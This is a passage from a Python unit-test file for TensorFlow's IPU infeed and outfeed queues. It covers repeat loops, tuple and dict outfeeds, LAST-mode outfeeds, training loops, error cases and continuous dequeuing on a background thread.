infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def program(iters):
def body(v, x):
v = v + x
return v
def my_net():
v = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(iters, body, (v), infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
return ipu.ipu_compiler.compile(my_net)
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(program(0))
self.assertAllClose(result[0], np.broadcast_to(0, [4, 4]))
# The iterator has not moved - next element should be all 1s.
result = sess.run(program(2))
self.assertAllClose(result[0], np.broadcast_to(1, [4, 4]))
# The iterator has moved - in the next two iterations it should pull 2 and 3.
result = sess.run(program(2))
self.assertAllClose(result[0], np.broadcast_to(5, [4, 4]))
# The iterator has moved - in the next two iterations it should pull 4 and 5.
result = sess.run(program(2))
self.assertAllClose(result[0], np.broadcast_to(9, [4, 4]))
@test_util.deprecated_graph_mode_only
def testTwoInfeedsDifferentPrograms(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset1 = tu.create_single_increasing_dataset(20, shape=[4, 4])
dataset2 = tu.create_single_increasing_dataset(3, shape=[4, 4])
infeed_queue1 = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset1)
infeed_queue2 = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset2)
def program(iters, infeed_queue):
def body(v, x):
v = v + x
return v
def my_net():
v = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(iters, body, (v), infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
return ipu.ipu_compiler.compile(my_net)
with session_lib.Session() as sess:
sess.run(infeed_queue1.initializer)
sess.run(infeed_queue2.initializer)
result = sess.run(program(5, infeed_queue1))
self.assertAllClose(result[0], np.broadcast_to(10, [4, 4]))
result = sess.run(program(5, infeed_queue2))
self.assertAllClose(result[0], np.broadcast_to(4, [4, 4]))
result = sess.run(program(5, infeed_queue1))
self.assertAllClose(result[0], np.broadcast_to(35, [4, 4]))
result = sess.run(program(5, infeed_queue2))
self.assertAllClose(result[0], np.broadcast_to(5, [4, 4]))
@test_util.deprecated_graph_mode_only
def testUndefinedShape(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
dataset = dataset.batch(10, drop_remainder=False)
with self.assertRaisesRegex(ValueError, r'Output shape \((\?|None),'):
ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
@test_util.deprecated_graph_mode_only
def testMultipleInitializations(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
_ = infeed_queue.initializer
with self.assertRaisesRegex(
ValueError,
'The IPUInfeedQueue `initializer` function can only be accessed once.'
):
_ = infeed_queue.initializer
def _testDatasetExceptionTerminates(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
# Normally we would use the deprecated_graph_mode_only decorator but this
# function is being called inside a subprocess independently.
with context.graph_mode():
BAD_PATH = 'this/path/doesnt/exist/'
dataset = readers.FixedLengthRecordDataset([BAD_PATH], 100)
dataset = dataset.map(
lambda f: parsing_ops.decode_raw(f, dtypes.float32)[0])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
with ipu.scopes.ipu_scope("/device:IPU:0"):
r = ipu.ipu_compiler.compile(infeed_queue._dequeue, []) # pylint: disable=protected-access
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(r)
def testDatasetExceptionTerminates(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
TIMEOUT = 10
cmd = [
sys.executable, __file__, "{}.{}".format(
InfeedOutfeedTest.__name__,
InfeedOutfeedTest._testDatasetExceptionTerminates.__name__)
]
result = subprocess.run(cmd, stderr=subprocess.PIPE, timeout=TIMEOUT)
self.assertEqual(result.returncode, -signal.SIGABRT)
error = result.stderr.decode()
self.assertIn("An infeed dataset iterator has failed", error)
@test_util.deprecated_graph_mode_only
def testTrainingLoopWithInfeed(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4, 2])
dataset = dataset.batch(batch_size=2, drop_remainder=True)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def my_net(iters):
def body(loss, x):
with variable_scope.variable_scope("vs", use_resource=True):
y = layers.Conv2D(2,
1,
use_bias=True,
kernel_initializer=init_ops.ones_initializer(),
name='conv1')(x)
loss = math_ops.reduce_sum(y)
optimizer = gradient_descent.GradientDescentOptimizer(0.1)
train = optimizer.minimize(loss)
with ops.control_dependencies([train]):
return array_ops.identity(loss)
loss = 0.0
return ipu.loops.repeat(iters, body, (loss), infeed_queue)
with ops.device('cpu'):
iters = array_ops.placeholder(np.int32, shape=[])
with ipu.scopes.ipu_scope("/device:IPU:0"):
r = ipu.ipu_compiler.compile(my_net, inputs=[iters])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(variables.global_variables_initializer())
initial_loss = sess.run(r, {iters: 1})
final_loss = sess.run(r, {iters: 1000})
self.assertTrue(initial_loss > final_loss)
@test_util.deprecated_graph_mode_only
def testMultipleOutfeedEnqueue(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v):
outfeed = outfeed_queue.enqueue(v)
outfeed = outfeed_queue.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net(v):
r = ipu.loops.repeat(20, body, (v))
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
with self.assertRaises(ValueError):
ipu.ipu_compiler.compile(my_net, inputs=[v])
@test_util.deprecated_graph_mode_only
def testMultipleOutfeedEnqueueDifferentGraphs(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v):
outfeed = outfeed_queue.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net(v):
r = ipu.loops.repeat(20, body, (v))
return r
with ops.Graph().as_default():
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
self.assertFalse(outfeed_queue.enqueued)
with ipu.scopes.ipu_scope("/device:IPU:0"):
ipu.ipu_compiler.compile(my_net, inputs=[v])
self.assertTrue(outfeed_queue.enqueued)
with ops.Graph().as_default():
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
# Not enqueued in the current graph.
self.assertFalse(outfeed_queue.enqueued)
with ipu.scopes.ipu_scope("/device:IPU:0"):
ipu.ipu_compiler.compile(my_net, inputs=[v])
self.assertTrue(outfeed_queue.enqueued)
@test_util.deprecated_graph_mode_only
def testSingleOutfeedRepeatNonTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v):
outfeed = outfeed_queue.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net(v):
r = ipu.loops.repeat(20, body, (v))
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
outfeed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(21, [4, 4]))
outfed = sess.run(outfeed)
for i in range(20):
self.assertAllClose(outfed[i], np.broadcast_to(i + 1, [4, 4]))
@test_util.deprecated_graph_mode_only
def testMultipleOutfeedsInSameGraph(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue1 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
outfeed_queue2 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def inner_body(v):
outfeed = outfeed_queue2.enqueue(v)
v = v + 1
return v, outfeed
def body(v):
outfeed = outfeed_queue1.enqueue(v)
v = ipu.loops.repeat(10, inner_body, v)
return v, outfeed
def my_net(v):
r = ipu.loops.repeat(10, body, v)
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
dequeued1 = outfeed_queue1.dequeue()
dequeued2 = outfeed_queue2.dequeue()
with session_lib.Session() as sess:
sess.run(res, {v: 0.0})
out1, out2 = sess.run([dequeued1, dequeued2])
self.assertAllEqual(np.arange(0, 100, step=10), out1)
self.assertAllEqual(np.arange(0, 100, step=1), out2)
@test_util.deprecated_graph_mode_only
def testSingleInfeedOutfeedRepeatNonTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v, x):
v = v + x
outfeed = outfeed_queue.enqueue(v)
return (v, outfeed)
def my_net(v):
r = ipu.loops.repeat(20, body, (v), infeed_queue)
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(91, [4, 4]))
outfed = sess.run(outfeed_queue.dequeue())
self.assertEqual(outfed.shape, (20, 4, 4))
self.assertAllClose(outfed[-1], result[0])
self.assertAllClose(outfed[5], np.broadcast_to(16, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedOutfeedRepeatTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
shape = [4, 4]
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v, im1, im2):
v = v + im1 + im2
outfeed = outfeed_queue.enqueue((v, im1, im2))
return (v, outfeed)
def my_net():
v = constant_op.constant(0.0, shape=shape, dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, shape))
outfed_result = sess.run(outfed)
self.assertTrue(len(outfed_result) == 3)
self.assertAllClose(outfed_result[0][0], np.broadcast_to(5, shape))
self.assertAllClose(outfed_result[0][1], np.broadcast_to(11.5, shape))
self.assertAllClose(outfed_result[0][2], np.broadcast_to(19.5, shape))
self.assertAllClose(outfed_result[0][3], np.broadcast_to(24.5, shape))
self.assertAllClose(outfed_result[0][4], np.broadcast_to(31, shape))
self.assertAllClose(outfed_result[1][0], np.broadcast_to(0, shape))
self.assertAllClose(outfed_result[1][1], np.broadcast_to(1, shape))
self.assertAllClose(outfed_result[1][2], np.broadcast_to(2, shape))
self.assertAllClose(outfed_result[1][3], np.broadcast_to(0, shape))
self.assertAllClose(outfed_result[1][4], np.broadcast_to(1, shape))
self.assertAllClose(outfed_result[2][0], np.broadcast_to(5, shape))
self.assertAllClose(outfed_result[2][1], np.broadcast_to(5.5, shape))
self.assertAllClose(outfed_result[2][2], np.broadcast_to(6, shape))
self.assertAllClose(outfed_result[2][3], np.broadcast_to(5, shape))
self.assertAllClose(outfed_result[2][4], np.broadcast_to(5.5, shape))
@test_util.deprecated_graph_mode_only
def testSingleInfeedOutfeedRepeatTupleLast(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
shape = [4, 4]
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue(
outfeed_mode=ipu.ipu_outfeed_queue.IPUOutfeedMode.LAST)
def body(v, im1, im2):
v = v + im1 + im2
outfeed = outfeed_queue.enqueue((v, im1, im2))
return (v, outfeed)
def my_net():
v = constant_op.constant(0.0, shape=shape, dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, shape))
outfed_result = sess.run(outfed)
self.assertTrue(len(outfed_result) == 3)
self.assertAllClose(outfed_result[0], np.broadcast_to(31, shape))
self.assertAllClose(outfed_result[1], np.broadcast_to(1, shape))
self.assertAllClose(outfed_result[2], np.broadcast_to(5.5, shape))
@test_util.deprecated_graph_mode_only
def testSingleInfeedOutfeedRepeatNamed(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
shape = [4, 4]
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v, im1, im2):
v = v + im1 + im2
outfeed = outfeed_queue.enqueue({"v": v, "image1": im1, "image2": im2})
return (v, outfeed)
def my_net():
v = constant_op.constant(0.0, shape=shape, dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, shape))
outfed_result = sess.run(outfed)
self.assertTrue(len(outfed_result) == 3)
self.assertAllClose(outfed_result["v"][0], np.broadcast_to(5, shape))
self.assertAllClose(outfed_result["v"][1], np.broadcast_to(11.5, shape))
self.assertAllClose(outfed_result["v"][2], np.broadcast_to(19.5, shape))
self.assertAllClose(outfed_result["v"][3], np.broadcast_to(24.5, shape))
self.assertAllClose(outfed_result["v"][4], np.broadcast_to(31, shape))
self.assertAllClose(outfed_result["image1"][0],
np.broadcast_to(0, shape))
self.assertAllClose(outfed_result["image1"][1],
np.broadcast_to(1, shape))
self.assertAllClose(outfed_result["image1"][2],
np.broadcast_to(2, shape))
self.assertAllClose(outfed_result["image1"][3],
np.broadcast_to(0, shape))
self.assertAllClose(outfed_result["image1"][4],
np.broadcast_to(1, shape))
self.assertAllClose(outfed_result["image2"][0],
np.broadcast_to(5, shape))
self.assertAllClose(outfed_result["image2"][1],
np.broadcast_to(5.5, shape))
self.assertAllClose(outfed_result["image2"][2],
np.broadcast_to(6, shape))
self.assertAllClose(outfed_result["image2"][3],
np.broadcast_to(5, shape))
self.assertAllClose(outfed_result["image2"][4],
np.broadcast_to(5.5, shape))
@test_util.deprecated_graph_mode_only
def testSingleInfeedOutfeedRepeatNamedLast(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
shape = [4, 4]
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue(
outfeed_mode=ipu.ipu_outfeed_queue.IPUOutfeedMode.LAST)
def body(v, im1, im2):
v = v + im1 + im2
outfeed = outfeed_queue.enqueue({"v": v, "image1": im1, "image2": im2})
return (v, outfeed)
def my_net():
v = constant_op.constant(0.0, shape=shape, dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, shape))
outfed_result = sess.run(outfed)
self.assertTrue(len(outfed_result) == 3)
self.assertAllClose(outfed_result["v"], np.broadcast_to(31, shape))
self.assertAllClose(outfed_result["image1"], np.broadcast_to(1, shape))
self.assertAllClose(outfed_result["image2"], np.broadcast_to(5.5, shape))
@test_util.deprecated_graph_mode_only
def testTrainingLoopWithInfeedAndOutfeedGetAll(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4, 2])
dataset = dataset.batch(batch_size=2, drop_remainder=True)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def my_net(iters):
def body(loss, x):
with variable_scope.variable_scope("vs", use_resource=True):
y = layers.Conv2D(2,
1,
use_bias=True,
kernel_initializer=init_ops.ones_initializer(),
name='conv1')(x)
loss = math_ops.reduce_sum(y)
optimizer = gradient_descent.GradientDescentOptimizer(0.1)
train = optimizer.minimize(loss)
outfeed = outfeed_queue.enqueue(loss)
with ops.control_dependencies([train]):
return (array_ops.identity(loss), outfeed)
loss = 0.0
return ipu.loops.repeat(iters, body, (loss), infeed_queue)
with ops.device('cpu'):
iters = array_ops.placeholder(np.int32, shape=[])
with ipu.scopes.ipu_scope("/device:IPU:0"):
r = ipu.ipu_compiler.compile(my_net, inputs=[iters])
outfeeds = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(variables.global_variables_initializer())
initial_loss = sess.run(r, {iters: 1})
final_loss = sess.run(r, {iters: 1000})
outfed = sess.run(outfeeds)
self.assertTrue(initial_loss > final_loss)
self.assertTrue(outfed.shape[0], 1001)
self.assertTrue(isinstance(outfed, np.ndarray))
@test_util.deprecated_graph_mode_only
def testTrainingLoopWithInfeedAndOutfeedGetLast(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4, 2])
dataset = dataset.batch(batch_size=2, drop_remainder=True)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue(
outfeed_mode=ipu.ipu_outfeed_queue.IPUOutfeedMode.LAST)
def my_net(iters):
def body(loss, x):
with variable_scope.variable_scope("vs", use_resource=True):
y = layers.Conv2D(2,
1,
use_bias=True,
kernel_initializer=init_ops.ones_initializer(),
name='conv1')(x)
loss = math_ops.reduce_sum(y)
optimizer = gradient_descent.GradientDescentOptimizer(0.1)
train = optimizer.minimize(loss)
outfeed = outfeed_queue.enqueue(loss)
with ops.control_dependencies([train]):
return (array_ops.identity(loss), outfeed)
loss = 0.0
return ipu.loops.repeat(iters, body, (loss), infeed_queue)
with ops.device('cpu'):
iters = array_ops.placeholder(np.int32, shape=[])
with ipu.scopes.ipu_scope("/device:IPU:0"):
r = ipu.ipu_compiler.compile(my_net, inputs=[iters])
outfeeds = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(variables.global_variables_initializer())
initial_loss = sess.run(r, {iters: 1})
final_loss = sess.run(r, {iters: 1000})
outfed = sess.run(outfeeds)
self.assertTrue(initial_loss > final_loss)
self.assertTrue(outfed == final_loss)
# Check that a scalar is returned instead of a numpy array
self.assertTrue(isinstance(outfed, np.float32))
@test_util.deprecated_graph_mode_only
def testTwoOutfeedsDifferentPrograms(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue1 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
outfeed_queue2 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body1(v):
outfeed = outfeed_queue1.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net1(v):
r = ipu.loops.repeat(5, body1, (v))
return r
def body2(v):
outfeed = outfeed_queue2.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net2(v):
r = ipu.loops.repeat(7, body2, (v))
return r
with ops.device('cpu'):
v1 = array_ops.placeholder(np.float32, [4, 4])
v2 = array_ops.placeholder(np.float32, [5, 5])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res1 = ipu.ipu_compiler.compile(my_net1, inputs=[v1])
res2 = ipu.ipu_compiler.compile(my_net2, inputs=[v2])
outfeed1 = outfeed_queue1.dequeue()
outfeed2 = outfeed_queue2.dequeue()
with session_lib.Session() as sess:
result1 = sess.run(res1, {v1: np.ones([4, 4], np.float32)})
self.assertAllClose(result1[0], np.broadcast_to(6, [4, 4]))
outfed1 = sess.run(outfeed1)
for i in range(5):
self.assertAllClose(outfed1[i], np.broadcast_to(i + 1, [4, 4]))
result2 = sess.run(res2, {v2: np.full([5, 5], 4, np.float32)})
self.assertAllClose(result2[0], np.broadcast_to(11, [5, 5]))
outfed2 = sess.run(outfeed2)
for i in range(7):
self.assertAllClose(outfed2[i], np.broadcast_to(i + 4, [5, 5]))
@test_util.deprecated_graph_mode_only
def testOutfeedNonTensorOutputs(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body1():
with variable_scope.variable_scope("", use_resource=True):
w = variable_scope.get_variable(
"w",
dtype=np.float32,
shape=[1],
initializer=init_ops.constant_initializer(2.0))
outfeed = outfeed_queue.enqueue({101: 1, 2020: w})
return outfeed
def net():
r = ipu.loops.repeat(5, body1)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(net, inputs=[])
outfeed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
tu.move_variable_initialization_to_cpu()
sess.run(variables.global_variables_initializer())
sess.run(res)
outfed = sess.run(outfeed)
for i in range(5):
self.assertAllClose(outfed[101][i], 1)
self.assertAllClose(outfed[2020][i], [2.0])
@test_util.deprecated_graph_mode_only
def testTwoOutfeedsDifferentProgramsDelayedOutfeedRead(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue1 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
outfeed_queue2 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body1(v):
outfeed = outfeed_queue1.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net1(v):
r = ipu.loops.repeat(5, body1, (v))
return r
def body2(v):
outfeed = outfeed_queue2.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net2(v):
r = ipu.loops.repeat(7, body2, (v))
return r
with ops.device('cpu'):
v1 = array_ops.placeholder(np.float32, [4, 4])
v2 = array_ops.placeholder(np.float32, [5, 5])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res1 = ipu.ipu_compiler.compile(my_net1, inputs=[v1])
res2 = ipu.ipu_compiler.compile(my_net2, inputs=[v2])
outfeed1 = outfeed_queue1.dequeue()
outfeed2 = outfeed_queue2.dequeue()
with session_lib.Session() as sess:
result1 = sess.run(res1, {v1: np.ones([4, 4], np.float32)})
self.assertAllClose(result1[0], np.broadcast_to(6, [4, 4]))
result2 = sess.run(res2, {v2: np.full([5, 5], 4, np.float32)})
self.assertAllClose(result2[0], np.broadcast_to(11, [5, 5]))
outfed1 = sess.run(outfeed1)
for i in range(5):
self.assertAllClose(outfed1[i], np.broadcast_to(i + 1, [4, 4]))
outfed2 = sess.run(outfeed2)
for i in range(7):
self.assertAllClose(outfed2[i], np.broadcast_to(i + 4, [5, 5]))
@test_util.deprecated_graph_mode_only
def testInfeedUsingDatasetWithNestedDictNotUnpacked(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
x = {
"x0": np.ones(shape=[2], dtype=np.float32),
"x1": np.ones(shape=[2], dtype=np.float32)
}
y = np.ones(shape=[2], dtype=np.float32)
ds = dataset_ops.Dataset.from_tensor_slices((x, y))
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(ds)
def body(total, x, y):
total += x["x0"] + x["x1"] + y
return total
def my_net():
r = ipu.loops.repeat(2, body, [0.0], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net)
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertEqual(result, [6.0])
@test_util.deprecated_graph_mode_only
def testInfeedUsingDatasetWithOnlyDictIsUnpacked(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
x = {
"x0": np.ones(shape=[2], dtype=np.float32),
"x1": np.ones(shape=[2], dtype=np.float32)
}
ds = dataset_ops.Dataset.from_tensor_slices((x,))
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(ds)
def body(total, x0, x1):
total += x0 + x1
return total
def my_net():
r = ipu.loops.repeat(2, body, [0.0], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net)
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertEqual(result, [4.0])
@test_util.deprecated_graph_mode_only
def testInfeedDeleteBeforeInitializeShouldRaiseException(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
delete_op = infeed_queue.deleter
with session_lib.Session() as sess:
with self.assertRaisesRegex(errors_impl.NotFoundError,
"Infeed with id="):
sess.run(delete_op)
@test_util.deprecated_graph_mode_only
def testInfeedRestart(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
# Note: This is not something that we encourage or need to support,
# but it is the current behaviour that we document in this test:
# The infeed can be restarted by calling the `deleter` and then the
# `initializer` again.
def data_gen():
for i in range(5):
yield i
dataset = dataset_ops.Dataset.from_generator(data_gen, np.float32, ())
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
init_op = infeed_queue.initializer
delete_op = infeed_queue.deleter
def body(v, x):
v = v + x
return v
def my_net(v):
r = ipu.loops.repeat(5, body, (v), infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
[res] = ipu.ipu_compiler.compile(my_net, inputs=[0.0])
with session_lib.Session() as sess:
for _ in range(2):
sess.run(init_op)
self.assertEqual(sum(range(5)), sess.run(res))
sess.run(delete_op)
@test_util.deprecated_graph_mode_only
def testInfeedOutfeedContinuousDequeuing(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
num_iterations = 1000
dataset = tu.create_single_increasing_dataset(num_iterations, shape=[1])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(x):
return outfeed_queue.enqueue(x)
def my_net():
return ipu.loops.repeat(num_iterations, body, [], infeed_queue)
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
def dequeue(result):
while len(result) != 1000:
r = sess.run(outfed)
if r.size:
result.extend(list(r.flatten()))
sess.run(infeed_queue.initializer)
r = []
dequeue_thread = Thread(target=dequeue, args=[r])
dequeue_thread.start()
sess.run(res)
dequeue_thread.join()
self.assertAllClose(r, range(0, 1000))
@test_util.deprecated_graph_mode_only
def testInfeedOutfeedContinuousDequeuingGetLastBeforeEnqueued(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
num_iterations = 1000
dataset = tu.create_single_increasing_dataset(num_iterations, shape=[1])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue(
outfeed_mode=ipu.ipu_outfeed_queue.IPUOutfeedMode.LAST)
def body(x):
return outfeed_queue.enqueue(x)
def my_net():
return ipu.loops.repeat(num_iterations, body, [], infeed_queue)
